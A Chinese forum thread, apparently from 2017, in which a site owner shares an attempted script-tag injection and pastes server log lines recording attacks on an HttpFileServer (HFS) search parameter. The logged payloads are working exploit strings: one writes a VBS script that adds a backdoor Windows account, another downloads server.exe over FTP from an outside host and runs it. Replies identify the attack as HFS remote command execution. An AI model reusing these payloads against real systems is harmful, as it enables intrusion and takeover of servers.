这是一个创建于 2539 天前的主题,其中的信息可能已经有所发展或是发生改变。
小学生还挺厉害的,成功注入 <script src="<a href=" https:="" <a="" href="http://gist.github.com" rel="nofollow">gist.github.com="" anonymous="" 876061f144c87428a0552e8da23d36a4"="" rel="nofollow">https://gist.github.com/anonymous/876061f144c87428a0552e8da23d36a4"></script>
 |
1
feast OP shit,怎么不正常,干脆直接贴
10:21:58 222.186.57.27:1682 请求 GET /?search={.save|1.vbs|a=replace("Set*o=CreateObject(""Shell.Users""):Set*z=o.create(""IDC_witkey""):z.changePassword*""zxc123..."","""":z.setting(""AccountType"")=3","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.} 10:22:46 222.186.57.27:2013 请求 GET /?search={.save|cmd.vbs|a=replace("set*objShell=wscript.createObject(""wscript.shell""):objShell.Run(""cmd.exe*/c*echo*open*d.lengyue.win*>1.txt*&&*echo*123*>>1.txt*&&*echo*123*>>1.txt*&&*echo*get*server.exe*>>1.txt*&&*echo*bye*>>1.txt*&&*ftp*-s:1.txt*&&*server.exe""):wscript.quit","*",Chr(32)):Execute(a). |
 |
2
nyanyh 2017-11-23 16:01:26 +08:00
有这时间干点啥不好非要分析入侵日志
之前我在 vps 上跑了个 flask 接收我写的一个小程序上传的数据,有几个无聊 IP 不停地往那个端口发各种数据,刚开始还想分析分析到底发了什么,现在 log 都几百 M 了,一点看得兴趣都没有了…… |
 |
3
sola97 2017-11-23 18:05:53 +08:00 via Android
不知道那个 server.exe 是干啥的
|
 |
4
jimmy2010 2017-11-23 18:21:30 +08:00 via Android  1
hfs 远程命令命令执行
|
Select Language